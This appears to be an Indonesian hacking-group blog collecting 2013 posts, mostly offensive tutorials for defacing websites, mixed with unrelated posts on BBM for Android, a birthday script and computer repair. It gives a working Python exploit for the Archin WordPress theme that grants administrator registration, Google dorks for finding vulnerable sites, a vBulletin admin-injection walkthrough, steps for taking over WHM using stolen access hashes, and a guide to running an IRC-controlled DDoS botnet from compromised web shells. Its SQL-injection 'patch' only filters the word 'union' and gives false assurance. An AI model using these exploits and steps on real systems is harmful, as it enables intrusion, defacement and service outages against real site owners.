DevilzCoder

Indonesian Cyber Army - Selamat siang sobat blogger dan sobat IDCA :D
Ketemu lagi sama posting saya yang rada semrawut dan rada pusing buat di baca wkwkwkw :D

Kali ini, saya akan memberikan sebuah tutorial cara mempatch bug SQL Injection, nah sebelum kita belajar ngepach apa sih SQL Injection itu ?

SQL Injection itu adalah salah sebuah celah yang keamanan yang terdapat pada lapisan basis data pada suatu website, eror akan muncul jika attacker menambah (string) pada akhir ulr webnya. Untuk lebih jelas langsung aja simak ulasan dari om Wikipedia dan bagi yang udah tau langsung simak cara berikut ya :)

[+] Langkah-Langkah [+]

Untuk bentuk erornya bisa lihat salah satu contoh gambar berikut :)

1. Buka editor Text misal Notepad / Notepad++, lalu copy kode berikut dan pastekan di Notepad kalian.

<?
if (ereg("%20union%20", $_GET['id'])||ereg("union",$_
GET['id']) || ereg("\*union\*",$_GET['id']) || ereg("\+union\+",
$_GET[id]) || ereg("\*",$_GET['id']))
{
ob_start();
header("location: index.php"); //bisa diganti sesuai selera :D
ob_flush();
}
?>

2. Upload file diatas ke dalam satu folder bersama index.php/public_html/htdocs

3. Kemudian buka file yang terdapat eror SQLI nya misal "http://bimo-cyber.org/artikel.php?id=011

nah jadi yang eror diatas adalah file artikel.php, maka yang di edit adalah file artikel.php

4. Kemudian masukan code berikut ke barisan code file artikel.php ( Taruh dibawah

include 'aman.php';

5. Kemudian save, dan coba lihat hasilnya =))

Semoga sukses :D

Untuk cara attack dengan memanfaatkan Celah SQL Injection, bisa baca tutorial berikut :D
1.) SqlMap Di Backtrack

2.) Tool Scanner

3.) SqlMap di Windows 7

4.) Dengan Havij

Content Created By : Bimo Septiawan

Posted in Security Website

Setelah sekian lama rumor mengenai BBM yang akan dilepas ke pengguna OS Android dan iOS beberapa waktu lalu, akhirnya terwujud juga. kini pengguna Smartphone Android OS bisa menikmati aplikasi besutan RIM tersebut.:D hanya saja aplikasi ini berjalan pada Android v.40 Ice Cream Sandwich - versi ke atas. bagi yang ingin mencobanya silahkan download aja :)

BBM For Android OS

Content Creator : Onix AQua

Posted in Android

Assalamualaikum...

Berhubung saya lupa2 mulu mo posting ni tools, jadi maaf aja kalo udah telat hehehe :D Fungsi dari tools scanner ini yaitu memudahkan mencari target website dalam satu server yang vulnerable terhadap JCE secara otomatis sehingga tanpa harus mengecek vulnerabilitas webnya satu persatu :) silahkan di sedot aja yah :)

1. JCE Scanner (Python)

2. JCE Scanner (PHP)

Cara penggunaannya cukup simple, untuk menggunakan tools ini sobat harus menginstall Python dan PHP sebagai pendukung, karena kedua tools ini dibuat dari bahasa Python dan PHP :) disini sobat hanya memasukkan IP web targetnya, kemudian biarkan tools bekerja mencari web yang vuln JCE :D untuk tutorial JCE silahkan baca artikel sebelmnya disini Begitu saja yang bisa saya berikan, mudah2an bisa bermanfaat buat sobat semua...

Content Creator : Onix AQua

Posted in Defacing , Hacking

Assalamualaikum...

DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang �menyerang� secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. Seperti yang kita ketahui bersama bahwa DDos merupakan teknik serangan yang paling ampuh yang digunakan para attacker dalam usaha menghancurkan website website target mereka. biasanya hal ini sering kita jumpai pada operasi operasi cyberwar. Banyak metode metode serang yang bisa digunakan dalam melakukan serangan. Perlu diketahui bahwa teknik DDos ini belum ada obatnya, jadi sangat berbahaya. ( Blablablabla.. onix mulai sok tau, wkwkwk ) Disini saya tidak akan mengulas masalah DDos secara detail, silahkan sobat cari sendiri di google yah,, wkwkwk :p

Sedikit cerita nih sebenarnya saya mempelajari teknik ini memakan waktu hampir satu minggu :( dari awal build server IRCnya sampai load script perlnya ke server dan selama itu saya mengalami banyak kegagalan, terutama di script perl nya yang selalu error (bukan codel sih, jadi ga mudeng) wkwkwkk... :D Tapi itu semua ga pernah membuatku menyerah dalam belajar :) dan akhirnya saya meminta bantuan seorang teman yg nickname nya Antonkill, disitu saya hanya meminta script perl punya dia, dan wow, langsung bisa dah.. jadi kendala saya waktu itu cuma pada script perlnya aja.. wkkwkwwk big thanks aja to beliau :D

Lanjut ke permasalahan utama yah :) oke sekarang saya akan sedikit menjelaskan cara bagaimana teknik DDos yang dilakukan melalui IRC.. kalo saya biasa suka menyebutnya sebagai ZOMBIE :D dan bahan bahan yg sobat butuhkan seperti berikut:

1. Server IRC

2. Script Perl DDos

3. Web Shelled ( Perl ON and Safemode OFF )

4. mIRC ato sejenisnya :3

Pertama tentunya sobat harus memiliki servernya :v kalo ga punya sebaiknya numpang saja ya di tempat orang jadi ga repot2 beli dan build servernya. punya saya kena suspend :( wkwkwkwk jadi solusinya silahkan sobat daftar aja di Server IRC punya om jatimcom ato di servernya om Hacker-newbie :D

oke silahkan join dulu yah disana :D lalu buat juga channel yg sobat inginkan sebagai tempat tongkrongannya zombie2 nantinya. sebelumnya edit dulu scriptnya,, silahkan dirubah yg penting2 saja :)

kalo sudah semua, langsung upload script perlnya ke shell sobat.. kemudian eksekusi dengan perintah : perl ddos

nah tunggu aja ntar pasti muncul di channel sobat :)

untuk melihat perintah2nya silahkan sobat ketik : !bot @help lalu !bot @ddos

sekarang saatnya uji coba :D silahkan sobat pilih metode serangannya.

Kalo hasilnya seperti gambar dibawah berarti zombienya bekerja. pokoknya ga pake repot bisa sambil nyantai2 dan ga menguras bandwidh internet sobat,, wkwkkwk :D

Demo punya ane tinggal dikit :3 banyak yg ilang kena suspend :(

Untuk hasil yang lebih maksimal, kumpulin aja sebanyak banyaknya :)

Note : Untuk masalah script perl ddosnya silahkan sobat search di google aja. karena saya tidak punya kuasa untuk mengsharenya disini :) mohon dimaklumi :p

saya kira cukup segitu saja, jika ada kesalahan mohon dikoreksi :) mudah2an bermafaat bagi yang membutuhkan sebagai pengetahuan dan pembelajaran, harap jangan disalah gunakan :3

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua

Sekian dan Terimakasih :* Wassalamualaikum...

Content Created By Onix AQua

Posted in Hacking

Assalammualaikum�

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya :3 ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!

Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk!

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua

Berikut bahan2 yg sobat butuhkan:

Web Shelled
Whmcs killer
Config whmcs

Disini saya udah nemu config WHMnya :

isi dalamnya seperti :

Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!

Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p

Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account

Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086

udah pada bisa kan? kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini

kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.

Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!

kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash

Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start

Setelah itu tinggal sobat buka WHMnya.. IP:Port

Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah, maaf kalo masih semerawut :D

Content Creator : Onix AQua

Posted in Defacing , Hacking

Selamat malam sobat IDCA, kayaknya dunia underground saat ini baru rame-ramenya Exploit vBulletin yaaa, ya udah dah ikut-ikutan ngesahre nih :P

[+] Dork [+]

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

[+] Langkah - Langkah [+]

1. Masukan expoit :/install/upgrade.php
#localhost/path//install/upgrade.php

Tampilan akan seperti ini'

2. Kemudian tekan CTRL + U dan cari Customer ID nya :)

3. Setelah itu, buka vBullein 0day disini, lalu masukan Costumer ID dan data lainnya :)

website diisi, contoh : http://bimo-cyber.org/install/upgrade.php

4. Setelah itu klik Inject Admin, maka tampilan akan seperti berikut

5. Nah sekarang tinggal login aja deh, login admin vBulletin adalah : /admincp/

#contoh : http://bimo-cyber.org/admincp/

Posted in Defacing

Selamat sore sobat IDCA, udah lama sekali nih engak coret-coret di blog lagi hehe :D
Untuk kesempatan kali ini, kita tinggalkan dulu soal hacking dan tetek bengeknya :)

Pada kesempatan kali ini, saya akan membagikan script "Ulang Tahun Flash Player" daripada bingung maksud saya apaan, langsung lihat aja penampakan berikut :)

Okay, gimana ? berminat? langsung aja sedot disini gan =))

DOWDOWNLOADNLOAD

#Note : Edit dibagian config.xml

Content Created By : Bimo Septiawan ( Garuda Attacker )

Posted in Script Romantis

Cara Memperbaiki Komputer Yang Sering Restart Sendiri - Pernahkah anda mengalami komputer anda tiba tiba mati dan restart sendiri? itu adalah salah satu dari gejala lain dari kerusakan komputer. Artikel kali ini akan membimbing sahabat tentang cara memperbaiki komputer yang sering restart sendiri berikut uraian lengkapnya di Belajar Teknisi Komputer

Pertama sekali kita pelajari dulu beberapa penyebab komputer sering restart sendiri seperti berikut ini :

Processor Komputer Terlalu Panas (over Head)

CPU / Processor yang terlalu panas dapat menyebabkan komputer restart, cek suhu CPU sobat pada systemBIOS, suhu normal berkisar antara 45� � 55� , jika ini yang menjadi penyebabnya.

Solusi : Lepas CPU / Processor , bersihkan berikan Thermal Pasta / Pasta Pendingin CPU, lihat kipas / fan nya, jika perlu ganti Thermal Pasta dengan yang baru.

Yang menyebabkan Processor Menjadi Panas

Terlalu banyak debu yang menempel pada cooler processor
Fan pada processor yang tidak jalan (sudah tidak berfungsi)
Thermal paste sudah tidak merekat pada processor dan cooler
Ruangan yang panas dan kondisi ruang yang kotor / banyak debu

Masalah Kerusakan Power Supply

Kerusakan Power Supply sedikit sekali yang memprediksi, Power Supply yang rusak akan mengalirkan listrik yang tidak sempurna yaitu naik � turun dan tersendat � sendat, ketika power supply tegangan turun, komputer sobat akan restart. [ Solusi : Cara mudah dan ampuh ialah menggunakan fan / kipas yang memiliki lampu, perhatikan terang lampunya, jika terkedip � kedip segeralah ganti power supply

Kerusakan pada Kelistrikan

Listrik adalah hal utama yang harus sobat periksa, dalam hal ini ialah Voltase (Voltage) tegangan listrik sobat. Gunakan AVO Meter untuk mengecek tegangan voltase listrik sobat, colokkan avo meter pada listrik dinding sobat, apakah sudah mencapai 220 V ? , jika tidak mencapai tegangan 220 V atau hanya sekitar 160 � 190 V ( naik turun ), saya jamin komputer sering restrart sendiri dalam hal ini sebagai solusi maka sobat harus menggunakan bantuan Stabilizer / Stavolt. (Supply listrik yang kurang akan menyebabkan komputer restart / mati dan berdampak pada kerusakan Hardware, Hard Disk, Motherboard dan Memory)

VGA Card Rusak

VGA Card yang sudah rusak mengakibatkan bagian pendinginnya akan cepat panas dan tampilan gambar di monitor juga rusak.

Harddisk Rusak / Bad sector

Hardisk rusak akan mengakibatkan komputer menjadi hang, muncul pesan bluescreen, komputer tidak dapat melakukan booting dan akan restart terus.

RAM / Memori Rusak

RAM yang rusak akan akan menimbulkan bunyi beep dan tidak bisa melakukan booting walaupun masuk ke windows safe mode.

Dari beberapa masalah komputer restart sendiri diatas, sahabat sebenarna bisa melakukan perbaikan sendiri dan tak perlu menghabiskan banyak biaya untuk dibawa ke tempat servis segala.

Rekomendasi :

Miliki Ebook "Teknisi Komputer Lengkap"

Membahas secara tuntas masalah kerusakan pada Komputer, Laptop dan jaringan.

>> MILIKI EBOOK INI <<

Semoga dengan bantaun Ebook diatas anda dapat melakukan perbaikan pada komputer yang sering restart tersebut.

Beberapa E-book Penunjang berikut juga sangat penting untuk sobat pahami :

Ebook Pandauan memperbaiki Motherboard
Ebook Cara memperbaiki Power Supply
Ebook Tutorial memperbaiki hardisk
Ebook Tutorial Elektronika

Semua Ebook yang saya rekomendasikan diatas dapat anda DOWNLOAD di Situs Resminya >> KLIK DISINI

Semoga dengan mengetahui penyebab, gejala dan beberapa solusi diatas dapat anda perbaiki dengan benar, berkat panduan Ebook Teknisi Komputer yang langsung ditulis oleh master teknisi komputer indonesia. perkenalkan belian adalah Om Qbonk sebagai nama aslinya "Agusale".

Demikianlah Cara Memperbaiki Komputer Yang Sering Restart Sendiri, semoga bermanfaat dan jadilah Teknisi Komputer yang handal. Wassaslam

Posted in Komputer Restart Sendiri

Selamat datang di blog IDCA :D
langsung saja deh, neh saya share trik Deface "Wordpress Theme Archin", tapi karena saya males ngetik jadi saya copas aja blognya si Mr Xenophobic. Ijin ya om XD XD

ok lanjut. berikut tool yang dibutuhkan :

Python

install Python, setelah selesai menginstall python, buka notepad dan paste script berikut :

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()

ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

save filenya dengan berekstensi .py
lalu cari target website dengan mengunakan dork berikut :

/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/

disini saya anggap anda sudah menemukan targetnya.

buka websitenya, trus di pencet CTRL+U, dan akan muncul tab baru, seperti dibawah ini :

setelah itu, kita klik url

http://site.com/wp-content/themes/temanya/style.css

dan ganti style.css menjadi hades_framework/option_panel/ajax.php.

sehingga menjadi seperti ini :

http://site.com/wp-content/themes/temanya/hades_framework/option_panel/ajax.php

jika website itu blank / tidak ada text apapun berarti itu vuln.
setelah itu buka start ~> Run ~> ketik "cmd" (akan muncul sebuah console / command prompt)

ketik "cd C:\" (karena script yg diatas saya letakkan di local disk)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :

jika muncul gambar seperti itu, tandanya itu berhasil. dan sekarang yang kita butuhkan adalah registrasi ke target website dengan menuju ke http://targetnya.com/wp-login.php trus klik register (setiap website berbeda bahasanya) untuk itu coba lihat screenshot berikut :

yang digaris merah itu, dalam bahasa inggris adalah register.
nb : jika tidak ada tombol register, brarti website itu mendisablenya.
dan lakukan registrasi seperti biasanya
nb : form yg atas adalah form username dan yg dibawahnya ada form email.

setelah melakukan registrasi, silahkan kalian cek email kalian yg sudah kalian isi di script.

ada kan ? klo ada buka email tersebut lalu buka login pagenya dan login dengan username tersebut.

Sumber : http://blog.xeno-info.tk/2013/08/archin-wordpress-theme-32.html

Posted in Defacing

Sabtu, 21 September 2013

Cara Patch Bugs SQL Injection [ Easy Method ]

Blackberry Messenger for Android Released!

Kamis, 19 September 2013

Tools JCE Server Scanner (Python & PHP)

DDos Attack via IRC / mIRC

Selasa, 17 September 2013

Hack Web Host Manager (WHM)

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit

Script Ulang Tahun Keren

Sabtu, 24 Agustus 2013

Cara Memperbaiki Komputer Yang Sering Restart Sendiri

Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Categories

Site Info

Top Posts

Archives